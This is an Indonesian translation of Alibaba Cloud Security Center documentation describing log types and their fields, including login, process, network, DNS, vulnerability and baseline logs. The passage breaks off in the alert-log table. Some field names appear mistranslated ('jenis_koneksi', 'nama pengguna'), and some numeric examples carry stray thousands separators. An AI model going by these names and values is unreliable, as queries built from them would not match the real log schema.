All Products
Search
Document Center

Simple Log Service:Jenis dan field log

Last Updated:Jul 06, 2025

Gunakan log Security Center untuk mengidentifikasi dan menanggapi peristiwa keamanan dengan cepat. Setelah membeli penyimpanan log, Security Center secara otomatis mengumpulkan log keamanan yang mencatat peristiwa terkait keamanan serta log host yang melacak aktivitas host. Topik ini menjelaskan jenis log yang didukung beserta field mereka.

Jenis log yang didukung

Jenis log yang didukung oleh edisi berbeda

Setiap edisi Security Center mendukung kemampuan keamanan yang berbeda, sehingga menghasilkan jenis log yang bervariasi. Tabel berikut menunjukkan jenis log yang didukung oleh masing-masing edisi.

Edisi

Jenis log yang didukung

Anti-virus, Advanced, Enterprise, dan Ultimate

  • Log host

    • Log login

    • Log koneksi jaringan

    • Log startup proses

    • Log serangan brute-force

    • Log snapshot akun (hanya didukung oleh Enterprise dan Ultimate)

    • Log snapshot jaringan (hanya didukung oleh Enterprise dan Ultimate)

    • Log snapshot proses (hanya didukung oleh Enterprise dan Ultimate)

    • Log permintaan DNS

    • Log event agen

  • Log keamanan

    • Log peringatan keamanan

    • Log pemantauan file inti (hanya didukung oleh Enterprise dan Ultimate)

    • Log kerentanan

    • Log pertahanan jaringan

    • Log pemeriksaan baseline CSPM (Cloud Security Posture Management) (Anti-virus tidak mendukung)

Basic

  • Log host

    • Log acara agen

  • Log keamanan

    • Log kerentanan (hanya mencatat kerentanan yang didukung oleh edisi Dasar)

    • Log peringatan keamanan (hanya mencatat peringatan yang didukung oleh edisi Dasar)

Tipe log yang didukung untuk fitur bernilai tambah

Saat menggunakan fitur bernilai tambah berikut, Anda tidak perlu membeli edisi berbayar dari Security Center. Cukup aktifkan fitur bernilai tambah yang sesuai. Setelah mengaktifkan fitur-fitur ini dan mengaktifkan analisis log Security Center, tipe log berikut akan didukung:

  • Log deteksi file jahat

  • Log deteksi tanpa agen

  • Log perlindungan aplikasi

  • Log pemeriksaan baseline CSPM

  • Log pemeriksaan konfigurasi layanan cloud CSPM

Kategori log

Log host

Tipe log

__topic__

Deskripsi

Siklus pengumpulan

Log masuk

aegis-log-login

Mencatat log aktivitas login pengguna ke server, termasuk waktu login, pengguna yang login, metode login, alamat IP login, dan informasi lainnya.

Log masuk membantu Anda memantau aktivitas pengguna, mengidentifikasi dan menanggapi perilaku abnormal dengan segera, sehingga memastikan keamanan sistem.

Catatan

Security Center tidak mendukung pencatatan log masuk untuk sistem operasi Windows Server 2008.

Pengumpulan real-time.

Log koneksi jaringan

aegis-log-network

Mencatat log aktivitas koneksi jaringan, termasuk 5-tupel koneksi server, waktu koneksi, status koneksi, dan informasi lainnya.

Log koneksi jaringan membantu Anda menemukan perilaku koneksi abnormal, mengidentifikasi serangan jaringan potensial, mengoptimalkan kinerja jaringan, dll.

Catatan
  • Server hanya mencatat beberapa status selama proses dari pembentukan hingga terminasi koneksi jaringan.

  • Lalu lintas masuk tidak dicatat.

Pengumpulan real-time.

Log startup proses

aegis-log-process

Mencatat log terkait startup proses di server, termasuk waktu startup proses, perintah startup, dan parameter.

Dengan mencatat dan menganalisis log startup proses, Anda dapat memahami status startup dan informasi konfigurasi proses dalam sistem, mendeteksi aktivitas proses abnormal, intrusi malware, ancaman keamanan, dan masalah lainnya.

Pengumpulan real-time, startup proses dilaporkan segera.

Log serangan brute-force

aegis-log-crack

Mencatat log perilaku serangan brute-force, termasuk upaya login dan menjebol sistem, aplikasi, atau akun.

Dengan mencatat dan menganalisis log serangan brute-force, Anda dapat memahami serangan brute-force pada sistem atau aplikasi, mendeteksi upaya login abnormal, kata sandi lemah, dan kebocoran kredensial. Log serangan brute-force juga dapat digunakan untuk melacak pengguna jahat dan melakukan analisis forensik, membantu tim keamanan dalam penanganan insiden dan investigasi.

Pengumpulan real-time.

Log snapshot akun

aegis-snapshot-host

Mencatat log informasi detail akun pengguna dalam sistem atau aplikasi, termasuk atribut dasar akun seperti nama pengguna, kebijakan kata sandi, riwayat login, dll.

Dengan membandingkan log snapshot akun pada titik waktu yang berbeda, Anda dapat memahami perubahan dan evolusi akun pengguna serta mendeteksi masalah keamanan akun potensial, seperti akses akun tidak sah, status akun abnormal, dll.

  • Saat Anda mengatur pengumpulan otomatis periodik menggunakan fitur Sidik Jari Aset, pengumpulan dilakukan secara otomatis sesuai siklus yang ditetapkan. Jika pengumpulan otomatis periodik tidak diatur, sistem melakukan pengumpulan sekali sehari.

  • Pengumpulan manual data sidik jari aset.

Log snapshot jaringan

aegis-snapshot-port

Mencatat log koneksi jaringan, termasuk 5-tupel, status koneksi, dan informasi proses terkait.

Dengan mencatat dan menganalisis log snapshot koneksi jaringan, Anda dapat memahami soket jaringan aktif dalam sistem, membantu Anda menemukan perilaku koneksi abnormal, mengidentifikasi serangan jaringan potensial, mengoptimalkan kinerja jaringan, dll.

Log snapshot proses

aegis-snapshot-process

Mencatat log aktivitas proses dalam sistem, termasuk ID proses, nama proses, waktu startup proses, dan informasi lainnya.

Dengan mencatat dan menganalisis log snapshot proses, Anda dapat memahami status aktivitas dan penggunaan sumber daya proses dalam sistem, mendeteksi proses abnormal, penggunaan CPU, kebocoran memori, dan masalah lainnya.

Log permintaan DNS

aegis-log-dns-query

Mencatat log permintaan kueri DNS, termasuk informasi detail tentang permintaan kueri DNS yang dikirim oleh server, seperti nama domain yang dikueri, tipe kueri, sumber kueri, dan informasi lainnya.

Dengan menganalisis log permintaan DNS, Anda dapat memahami aktivitas kueri DNS dalam jaringan, mendeteksi perilaku kueri abnormal, pembajakan domain, keracunan DNS, dan masalah lainnya.

Catatan

Untuk server Linux dengan versi kernel lebih rendah dari seri 4.X.X, Security Center tidak mendukung pengumpulan log permintaan DNS dan deteksi perilaku DNS jahat. Disarankan agar Anda mempertimbangkan untuk meningkatkan kernel sistem ke versi yang lebih tinggi untuk mendapatkan kemampuan deteksi ancaman yang komprehensif.

Pengumpulan real-time.

Log peristiwa agen

aegis-log-client

Mencatat peristiwa online dan offline dari agen Security Center.

Pengumpulan real-time.

Tipe log keamanan

Tipe log

__topic__

Deskripsi

Siklus pengumpulan

Log kerentanan

sas-vul-log

Mencatat log informasi terkait kerentanan yang ditemukan dalam sistem atau aplikasi, termasuk nama kerentanan, status kerentanan, tindakan penanganan, dan informasi lainnya.

Dengan mencatat dan menganalisis log kerentanan, Anda dapat memahami kerentanan dalam sistem, risiko keamanan, dan tren serangan, serta mengambil langkah perbaikan yang tepat secara tepat waktu.

Pengumpulan real-time.

Log baseline CSPM

sas-hc-log

Mencatat log hasil pemeriksaan risiko baseline, termasuk tingkat baseline, kategori baseline, tingkat risiko, dan informasi lainnya.

Dengan mencatat dan menganalisis log risiko baseline, Anda dapat memahami status keamanan baseline dan risiko potensial sistem.

Catatan

Hanya mencatat data untuk item pemeriksaan yang gagal untuk pertama kali, dan data untuk item pemeriksaan yang sebelumnya lulus tetapi gagal saat pemeriksaan ulang.

Log peringatan keamanan

sas-security-log

Mencatat log peristiwa keamanan dan informasi peringatan yang terjadi dalam sistem atau aplikasi, termasuk sumber data peringatan, detail peringatan, tingkat peringatan, dan informasi lainnya.

Dengan mencatat dan menganalisis log peringatan keamanan, Anda dapat memahami peristiwa keamanan dan ancaman dalam sistem dan mengambil langkah respons yang sesuai secara tepat waktu.

Log pemeriksaan konfigurasi platform cloud - CSPM

sas-cspm-log

Mencatat log terkait manajemen postur keamanan cloud, termasuk hasil pemeriksaan, operasi daftar putih, dan informasi lainnya dari manajemen postur keamanan cloud.

Dengan mencatat dan menganalisis log manajemen postur keamanan cloud, Anda dapat memahami masalah konfigurasi dan risiko keamanan potensial dalam platform cloud.

Log pertahanan jaringan

sas-net-block

Mencatat log peristiwa serangan jaringan, termasuk tipe serangan, alamat IP sumber, alamat IP target, dan informasi kunci lainnya.

Dengan mencatat dan menganalisis log pertahanan jaringan, Anda dapat memahami peristiwa keamanan yang terjadi dalam jaringan, dan kemudian mengambil langkah respons dan pertahanan yang sesuai untuk meningkatkan keamanan dan keandalan jaringan.

Log perlindungan aplikasi

sas-rasp-log

Mencatat log informasi peringatan serangan dari fitur perlindungan aplikasi, termasuk tipe serangan, data perilaku, IP penyerang, dan informasi kunci lainnya.

Dengan mencatat dan menganalisis log peringatan perlindungan aplikasi, Anda dapat memahami peristiwa keamanan yang terjadi dalam aplikasi, dan kemudian mengambil langkah respons dan pertahanan yang sesuai untuk meningkatkan keamanan dan keandalan aplikasi.

Log deteksi file jahat

sas-filedetect-log

Mencatat log deteksi file jahat menggunakan fitur SDK deteksi file jahat, termasuk informasi file, skenario deteksi, hasil deteksi, dan informasi lainnya untuk deteksi file jahat.

Dengan mencatat dan menganalisis log deteksi file jahat, Anda dapat mengidentifikasi virus umum dalam file offline dan file Alibaba Cloud OSS, seperti ransomware, program penambangan, dll., dan menanganinya dengan segera untuk mencegah penyebaran dan eksekusi file jahat.

Log peristiwa pemantauan file inti

aegis-file-protect-log

Mencatat peristiwa peringatan yang terdeteksi menggunakan fitur pemantauan file inti, termasuk jalur file, operasi yang dilakukan pada file, tingkat peringatan, dan informasi lainnya.

Dengan mencatat dan menganalisis log peristiwa pemantauan file inti, Anda dapat memantau apakah file inti dicuri atau dirusak.

Log deteksi tanpa agen

sas-agentless-log

Mencatat risiko keamanan yang terdeteksi dalam Elastic Compute Service (ECS), dan gambar menggunakan fitur deteksi tanpa agen, termasuk kerentanan, baseline, sampel jahat, dan file sensitif.

Dengan mencatat dan menganalisis log deteksi tanpa agen, Anda dapat melihat risiko keamanan dalam aset selama periode waktu yang berbeda, membantu Anda mengidentifikasi dan menangani ancaman potensial.

Log jaringan (tidak lagi didukung untuk pengiriman)

Penting
  • Mulai 27 Maret 2025, fitur analisis log tidak lagi mendukung pengiriman log jaringan, termasuk log akses web, log DNS, log sesi jaringan, dan log DNS lokal. Untuk solusi alternatif terkait log jaringan, lihat Solusi Alternatif untuk Menambahkan atau Mengirimkan Log Jaringan.

  • Jika Anda telah mengaktifkan pengiriman log jaringan, layanan ini akan berakhir pada 27 Maret 2025, dan data log jaringan baru tidak akan dikirimkan lagi. Fungsi kueri untuk log jaringan di halaman Log Analysis pada konsol Security Center akan dihentikan.

    Untuk menanyakan log jaringan yang telah dikirimkan, klik Advanced Management of Simple Log Service di pojok kanan atas halaman Log Analysis untuk membuka konsol Simple Log Service. Gunakan deskripsi field log di lampiran untuk melihat log jaringan yang telah dikirimkan.

Jenis log

__topic__

Deskripsi

Siklus pengumpulan

Log akses web

sas-log-http

Log permintaan pengguna ke server web dan respons dari server web, termasuk alamat IP pengguna, waktu permintaan, metode permintaan, URL permintaan, kode status HTTP, dan ukuran respons.

Log akses web digunakan untuk menganalisis lalu lintas web dan perilaku pengguna, mengidentifikasi pola akses dan anomali, serta mengoptimalkan kinerja situs web.

Pada umumnya, log dikumpulkan 1 hingga 12 jam setelah log dihasilkan.

Log DNS

sas-log-dns

Log detail resolusi DNS, termasuk nama domain yang diminta, tipe kueri, alamat IP klien, dan nilai respons.

Anda dapat memantau proses permintaan dan respons resolusi DNS, serta mengidentifikasi perilaku resolusi abnormal, pembajakan DNS, dan keracunan DNS berdasarkan log DNS.

Log sesi jaringan

sas-log-session

Log koneksi jaringan dan transmisi data, termasuk detail sesi jaringan. Detail tersebut mencakup waktu mulai sesi, alamat IP sumber, alamat IP tujuan, protokol, dan port.

Log sesi jaringan umumnya digunakan untuk memantau lalu lintas jaringan, mengidentifikasi ancaman potensial, dan mengoptimalkan kinerja jaringan.

Log DNS lokal

local-dns

Log kueri dan respons DNS pada server DNS lokal, termasuk nama domain yang diminta, tipe kueri, alamat IP klien, dan nilai respons.

Anda dapat memperoleh informasi tentang kueri DNS di jaringan Anda, dan mengidentifikasi masalah seperti perilaku kueri abnormal, pembajakan domain, dan keracunan DNS berdasarkan log DNS internal.

Kategori log host

Log masuk

Nama field

Deskripsi

Contoh

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server.

192.168.XX.XX

sas_group_name

Grup aset tempat server termasuk di Security Center.

default

uuid

UUID server.

5d83b26b-b7ca-4a0a-9267-12****

src_ip

Alamat IP yang digunakan untuk masuk ke server.

221.11.XX.XX

dst_port

Port yang digunakan untuk masuk ke server.

22

login_type

Tipe login. Nilai valid termasuk nilai-nilai berikut:

  • SSHLOGIN dan SSH: Login SSH

  • RDPLOGIN: login remote desktop

  • IPCLOGIN: login koneksi IPC

SSH

username

Nama pengguna yang digunakan untuk login.

admin

login_count

Jumlah percobaan login.

Percobaan login berulang dalam 1 menit dicatat dalam satu log. Sebagai contoh, jika nilai field login_count adalah 3, maka ada 3 percobaan login dalam 1 menit.

3

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log koneksi jaringan

Nama field

Deskripsi

Contoh

cmd_chain

Rantai proses.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

Indeks rantai proses. Anda dapat menggunakan indeks untuk mencari rantai proses.

B184

container_hostname

Nama server di dalam kontainer.

nginx-ingress-controller-765f67fd4d-****

container_id

ID kontainer.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

ID image.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

Nama image.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

Nama kontainer.

nginx-ingress-****

container_pid

ID proses di dalam kontainer.

0

net_connect_dir

Arah koneksi jaringan. Nilai valid:

  • in

  • out

in

dst_ip

Alamat IP tujuan.

  • Jika nilai dir adalah out, nilai field ini adalah alamat IP host peer.

  • Jika nilai dir adalah in, nilai field ini adalah alamat IP host Anda.

192.168.XX.XX

dst_port

Port tujuan.

443

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server.

192.168.XX.XX

parent_proc_name

Nama file proses induk.

/usr/bin/bash

pid

ID proses.

14275

ppid

ID proses induk.

14268

proc_name

Nama proses.

nginx

proc_path

Path lengkap ke file proses.

/usr/local/nginx/sbin/nginx

proc_start_time

Waktu proses dimulai.

N/A

jenis_koneksi

Protokol. Nilai yang valid:

  • tcp

  • raw, yang menunjukkan raw socket

tcp

sas_group_name

Grup aset tempat server termasuk di Security Center.

default

src_ip

Alamat IP sumber.

100.127.XX.XX

src_port

Port sumber.

41.897

srv_comm

Nama perintah yang terkait dengan proses induk dari proses induk.

containerd-shim

status

Status koneksi jaringan. Nilai yang valid:

  • 1: Koneksi ditutup.

  • 2: Koneksi akan dibangun.

  • 3: Paket SYN telah dikirim.

  • 4: Paket SYN telah diterima.

  • 5: Koneksi telah dibangun.

  • 6: Koneksi sedang menunggu untuk ditutup.

  • 7: Koneksi sedang ditutup.

  • 8: Titik akhir lokal sedang menunggu pengakuan permintaan penghentian koneksi dari titik akhir rekan.

  • 9: Titik akhir lokal sedang menunggu permintaan penghentian koneksi dari titik akhir rekan setelah menerima pengakuan dari titik akhir rekan.

  • 10: Titik akhir lokal sedang menunggu waktu yang cukup berlalu untuk memastikan bahwa titik akhir rekan menerima pengakuan dari titik akhir lokal.

  • 11: TCB untuk koneksi dihapus.

5

tipe

Tipe koneksi jaringan real-time. Nilai yang valid:

  • connect: Koneksi TCP dimulai

  • accept: Koneksi TCP diterima

  • listen: Mendengarkan port

listen

uid

ID pengguna yang memulai proses tersebut.

101

nama pengguna

Nama pengguna yang memulai proses tersebut.

root

uuid

UUID dari server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1719472214

Log startup proses

Nama field

Deskripsi

Contoh

cmd_chain

Rantai proses.

[

{

"9883":"bash -c kill -0 -- -'6274'"

}

......

]

cmd_chain_index

Indeks dari rantai proses. Anda dapat menggunakan indeks untuk mencari rantai proses.

B184

cmd_index

Indeks dari parameter di baris perintah. Setiap dua indeks dikelompokkan untuk mengidentifikasi awal dan akhir dari sebuah parameter.

0,3,5,8

cmdline

Perintah lengkap untuk memulai proses.

ipset list KUBE-6-CLUSTER-IP

comm

Nama perintah yang terkait dengan proses.

N/A

container_hostname

Nama server di dalam kontainer.

nginx-ingress-controller-765f67fd4d-****

container_id

ID kontainer.

4181de1e2b20c3397f1c409266dbd5631d1bc5be7af85246b0d****

container_image_id

ID gambar.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-controller@sha256:5f281994d9e71a1b1a087365271024991c5b0d0543c48f0****

container_image_name

Nama gambar.

registry-cn-beijing-vpc.ack.aliyuncs.com/acs/aliyun-ingress-****

container_name

Nama kontainer.

nginx-ingress-****

container_pid

ID proses di dalam kontainer.

0

cwd

Direktori kerja saat ini (CWD) dari proses.

N/A

proc_name

Nama file proses.

ipset

proc_path

Jalur lengkap ke file proses.

/usr/sbin/ipset

gid

ID grup proses.

0

groupname

Nama grup pengguna.

group1

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server.

192.168.XX.XX

parent_cmd_line

Baris perintah dari proses induk.

/usr/local/bin/kube-proxy --config=/var/lib/kube-proxy/config.conf --hostname-override=cn-beijing.192.168.XX.XX

parent_proc_name

Nama file proses induk.

kube-proxy

parent_proc_path

Jalur lengkap ke file proses induk.

/usr/local/bin/kube-proxy

pid

ID proses.

14275

ppid

ID proses induk.

14268

proc_start_time

Waktu ketika proses dimulai.

2024-08-01 16:45:40

parent_proc_start_time

Waktu ketika proses induk dimulai.

2024-07-12 19:45:19

sas_group_name

Grup aset tempat server termasuk di Security Center.

default

srv_cmd

Baris perintah dari proses leluhur.

/usr/bin/containerd

tty

Terminal yang digunakan untuk masuk. Nilai N/A menunjukkan bahwa akun belum digunakan untuk masuk terminal.

N/A

uid

ID pengguna.

123

username

Nama pengguna yang memulai proses.

root

uuid

UUID server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Timestamp mulai, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1719472214

Log serangan brute-force

Nama bidang

Deskripsi

Contoh

instance_id

ID dari instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server yang sedang mengalami serangan brute-force.

192.168.XX.XX

sas_group_name

Grup aset tempat server termasuk dalam Security Center.

default

uuid

UUID dari server yang sedang mengalami serangan brute-force.

5d83b26b-b7ca-4a0a-9267-12*****

login_count

Jumlah percobaan logon gagal.

Percobaan logon berulang dalam 1 menit dicatat dalam satu log. Sebagai contoh, jika nilai dari bidang warn_count adalah 3, tiga percobaan logon dilakukan dalam 1 menit.

3

src_ip

Alamat IP sumber.

47.92.XX.XX

dst_port

Port logon.

22

login_type

Tipe logon. Nilai valid:

  • SSHLOGIN dan SSH: Logon SSH

  • RDPLOGIN: Logon remote desktop

  • IPCLOGIN: Logon koneksi IPC

SSH

username

Nama pengguna yang digunakan untuk logon.

user

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log snapshot akun

Nama bidang

Deskripsi

Contoh

account_expire

Tanggal kedaluwarsa akun. Nilai never menunjukkan bahwa akun tidak pernah kedaluwarsa.

never

domain

Domain atau direktori tempat akun berada. Nilai N/A menunjukkan bahwa akun tidak termasuk dalam domain.

N/A

groups

Grup tempat akun berada. Nilai N/A menunjukkan bahwa akun tidak termasuk dalam grup.

["nscd"]

home_dir

Direktori home, yaitu direktori default untuk menyimpan dan mengelola file di sistem.

/Users/abc

instance_id

ID dari instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server.

192.168.XX.XX

last_chg

Tanggal terakhir kali kata sandi diubah.

2022-11-29

last_logon

Tanggal dan waktu logon terakhir yang dilakukan menggunakan akun. Nilai N/A menunjukkan bahwa akun belum digunakan untuk logon.

2023-08-18 09:21:21

login_ip

Alamat IP dari mana logon jarak jauh terakhir dilakukan menggunakan akun. Nilai N/A menunjukkan bahwa akun belum digunakan untuk logon.

192.168.XX.XX

passwd_expire

Tanggal kedaluwarsa kata sandi. Nilai never menunjukkan bahwa kata sandi tidak pernah kedaluwarsa.

2024-08-24

perm

Menunjukkan apakah akun memiliki izin root. Nilai valid:

  • 0: tidak

  • 1: ya

0

sas_group_name

Grup aset tempat server berada di Security Center.

default

shell

Perintah shell Linux.

/sbin/nologin

status

Status akun. Nilai valid:

  • 0: Logon dari akun tidak diizinkan.

  • 1: Logon dari akun diizinkan.

0

tty

Terminal yang masuk ke dalamnya. Nilai N/A menunjukkan bahwa akun belum digunakan untuk logon terminal.

N/A

username

Nama pengguna.

nscd

uuid

UUID server.

5d83b26b-b7ca-4a0a-9267-12****

warn_time

Tanggal ketika Anda diberitahu tentang kata sandi yang akan kedaluwarsa. Nilai never menunjukkan bahwa tidak ada pemberitahuan yang dikirim.

2024-08-20

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log snapshot jaringan

Nama bidang

Deskripsi

Contoh

net_connect_dir

Arah koneksi jaringan. Nilai yang valid:

  • in

  • out

in

dst_ip

Alamat IP tujuan.

  • Jika nilai dir adalah out, nilai dari bidang ini adalah alamat IP host peer.

  • Jika nilai dir adalah in, nilai dari bidang ini adalah alamat IP host Anda.

192.168.XX.XX

dst_port

Port tujuan.

443

instance_id

ID dari instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server.

192.168.XX.XX

pid

ID dari proses.

682

proc_name

Nama dari proses.

sshd

connection_type

Protokol. Nilai yang valid:

  • tcp4: Koneksi TCP melalui alamat IPv4

  • tcp6: Koneksi TCP melalui alamat IPv6

tcp4

sas_group_name

Grup aset tempat server termasuk dalam Security Center.

default

src_ip

Alamat IP sumber.

100.127.XX.XX

src_port

Port sumber.

41897

status

Status koneksi jaringan. Nilai yang valid:

  • 1: Koneksi ditutup.

  • 2: Koneksi akan dibentuk.

  • 3: Paket SYN dikirim.

  • 4: Paket SYN diterima.

  • 5: Koneksi telah dibentuk.

  • 6: Koneksi menunggu untuk ditutup.

  • 7: Koneksi sedang ditutup.

  • 8: Titik akhir lokal menunggu pengakuan permintaan terminasi koneksi dari titik akhir peer.

  • 9: Titik akhir lokal menunggu permintaan terminasi koneksi dari titik akhir peer setelah menerima pengakuan dari titik akhir peer.

  • 10: Titik akhir lokal menunggu waktu cukup berlalu untuk memastikan bahwa titik akhir peer menerima pengakuan dari titik akhir lokal.

  • 11: TCB untuk koneksi dihapus.

5

uuid

UUID dari server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1719472214

Log snapshot proses

Nama field

Deskripsi

Contoh

cmdline

Perintah lengkap untuk memulai proses.

/usr/local/share/assist-daemon/assist_daemon

instance_id

ID dari instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP server.

192.168.XX.XX

md5

Nilai hash MD5 dari file biner.

Catatan

Algoritma MD5 tidak didukung untuk file yang ukurannya melebihi 1 MB.

1086e731640751c9802c19a7f53a64f5

proc_name

Nama file proses.

assist_daemon

proc_path

Jalur lengkap ke file proses.

/usr/local/share/assist-daemon/assist_daemon

pid

ID dari proses.

1.692

pname

Nama file proses induk.

systemd

sas_group_name

Grup aset tempat server termasuk di Security Center.

default

proc_start_time

Waktu ketika proses dimulai. Ini adalah field bawaan.

2023-08-18 20:00:12

uid

ID pengguna yang memulai proses.

101

username

Nama pengguna yang memulai proses.

root

uuid

UUID dari server.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Timestamp awal, yang menunjukkan waktu ketika peristiwa terjadi. Satuan: detik.

1.719.472.214

Log permintaan DNS

Nama bidang

Deskripsi

Contoh

domain

Nama domain yang termasuk dalam permintaan DNS.

example.aliyundoc.com

instance_id

ID dari instance.

i-2zeg4zldn8zypsfg****

host_ip

Alamat IP dari server yang memulai permintaan DNS.

192.168.XX.XX

pid

ID dari proses yang memulai permintaan DNS.

3544

ppid

ID dari proses induk yang memulai permintaan DNS.

3408

cmd_chain

Rantai proses yang memulai permintaan DNS.

"3544":"\"C:\\Program Files (x86)\\Alibaba\\Aegis\\AliDetect\\AliDetect.exe\""

cmdline

Baris perintah dari proses yang memulai permintaan DNS.

C:\Program Files (x86)\Alibaba\Aegis\AliDetect\AliDetect.exe

proc_path

Jalur ke proses yang memulai permintaan DNS.

C:/Program Files (x86)/Alibaba/Aegis/AliDetect/AliDetect.exe

sas_group_name

Grup aset tempat server tersebut berada di Security Center.

default

time

Waktu ketika permintaan DNS ditangkap. Dalam banyak kasus, nilainya adalah saat permintaan DNS dimulai.

2023-08-17 20:05:04

uuid

UUID dari server yang memulai permintaan DNS.

5d83b26b-b7ca-4a0a-9267-12****

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log peristiwa agen

Nama bidang

Deskripsi

Contoh

uuid

UUID server.

5d83b26b-b7ca-4a0a-9267-12****

host_ip

Alamat IP server.

192.168.XX.XX

agent_version

Versi agen Security Center.

aegis_11_91

last_login

Cap waktu login terakhir. Satuan: milidetik.

1716444387617

platform

Jenis sistem operasi. Nilai yang valid:

  • windows

  • linux

linux

region_id

ID wilayah tempat server berada.

cn-beijing

status

Status agen Security Center. Nilai yang valid:

  • online

  • offline

online

start_time

Cap waktu mulai, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log field keamanan

Log kerentanan

Nama field

Deskripsi

Contoh

vul_alias_name

Alias dari kerentanan.

CESA-2023:1335: openssl Security Update

risk_level

Tingkat risiko. Nilai valid:

  • asap: tinggi

  • later: sedang

  • nntf: rendah

later

extend_content

Informasi tambahan tentang kerentanan.

{"cveList":["CVE-2023-0286"],"necessity":{"gmt_create":"20230816","connect_cnt":80,"total_score":0.0,"assets_factor":1.0,"enviroment_factor":1.5,"status":"normal"},"os":"centos","osRelease":"7","preCheck":{},"rpmCanUpdate":true,"rpmEntityList":[{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl-libs version less than 1.0.2k-26.el7_9","matchList":["openssl-libs version less than 1.0.2k-26.el7_9"],"name":"openssl-libs","nextResult":false,"path":"/etc/pki/tls","result":true,"updateCmd":"yum update openssl-libs","version":"1.0.2k-25.el7_9"},{"fullVersion":"1.0.2k-25.el7_9","kernel":false,"matchDetail":"openssl version less than 1.0.2k-26.el7_9","matchList":["openssl version less than 1.0.2k-26.el7_9"],"name":"openssl","nextResult":false,"path":"/etc/pki/CA","result":true,"updateCmd":"yum update openssl","version":"1.0.2k-25.el7_9"}]}

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

internet_ip

Alamat IP publik host.

39.104.XX.XX

intranet_ip

Alamat IP privat host.

192.168.XX.XX

instance_name

Nama host.

hhht-linux-***

vul_name

Nama kerentanan.

centos:7:cesa-2023:1335

operation

Operasi pada kerentanan. Nilai valid:

  • new

  • verify

  • fix

new

status

Informasi status. Nilai valid:

  • 1: belum diperbaiki

  • 2: perbaikan gagal

  • 3: rollback gagal

  • 4: memperbaiki

  • 5: melakukan rollback

  • 6: memverifikasi

  • 7: sudah diperbaiki

  • 8: sudah diperbaiki dan menunggu restart

  • 9: telah dikembalikan

  • 10: diabaikan

  • 11: dikembalikan dan menunggu restart

  • 12: tidak ada lagi

  • 13: kedaluwarsa

1

tag

Tag yang ditambahkan ke kerentanan. Nilai valid:

  • oval: Kerentanan perangkat lunak Linux

  • system: Kerentanan sistem Windows

  • cms: Kerentanan Web-CMS

    Catatan

    String acak menunjukkan jenis kerentanan lainnya.

oval

type

Jenis kerentanan. Nilai valid:

  • sys: Kerentanan sistem Windows

  • cve: Kerentanan perangkat lunak Linux

  • cms: Kerentanan Web-CMS

  • emg: Kerentanan mendesak

sys

uuid

UUID server.

ad66133a-dc82-4e5e-9659-a49e3****

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log CSPM-baseline

Nama field

Deskripsi

Contoh

check_item_name

Nama item pemeriksaan.

Setel interval terpendek antara perubahan kata sandi

check_item_level

Tingkat risiko baseline. Nilai valid:

  • high

  • medium

  • low

medium

check_type

Jenis item pemeriksaan.

Otentikasi identitas

instance_id

ID instance.

i-2zeg4zldn8zypsfg****

risk_level

Tingkat keparahan item risiko. Nilai valid:

  • high

  • medium

  • low

medium

operation

Operasi. Nilai valid:

  • new

  • verity

new

risk_name

Nama item risiko.

Pemeriksaan kepatuhan kata sandi

sas_group_name

Grup server tempat server berada di Pusat Keamanan. Item risiko terdeteksi pada server tersebut.

default

status

Informasi status. Nilai valid:

  • 1: belum diperbaiki

  • 2: perbaikan gagal

  • 3: rollback gagal

  • 4: memperbaiki

  • 5: melakukan rollback

  • 6: memverifikasi

  • 7: sudah diperbaiki

  • 8: sudah diperbaiki dan menunggu restart

  • 9: telah dikembalikan

  • 10: diabaikan

  • 11: dikembalikan dan menunggu restart

  • 12: tidak ada lagi

  • 13: kedaluwarsa

1

sub_type_alias_name

Alias subtype dalam bahasa Cina.

Praktik Terbaik Internasional untuk Keamanan - Ubuntu 16/18/20/22 Pemeriksaan Baseline Keamanan

sub_type_name

Nama subtype. Untuk informasi lebih lanjut tentang subtype baseline, lihat Jenis dan subtype baseline.

hc_ubuntu16_cis_rules

type_alias_name

Alias tipe pemeriksaan dalam bahasa Cina.

Praktik Terbaik Internasional untuk Keamanan

type_name

Tipe baseline. Untuk informasi lebih lanjut tentang tipe baseline, lihat Jenis dan subtype baseline.

cis

uuid

UUID server tempat item risiko terdeteksi.

1ad66133a-dc82-4e5e-9659-a49e3****

start_time

Timestamp awal, yang menunjukkan waktu terjadinya peristiwa. Satuan: detik.

1719472214

Log peringatan keamanan

Nama field

Deskripsi

Contoh

data_source

Sumber data. Nilai valid:

  • aegis_suspicious_event: pengecualian host

  • aegis_suspicious_file_v2: webshell

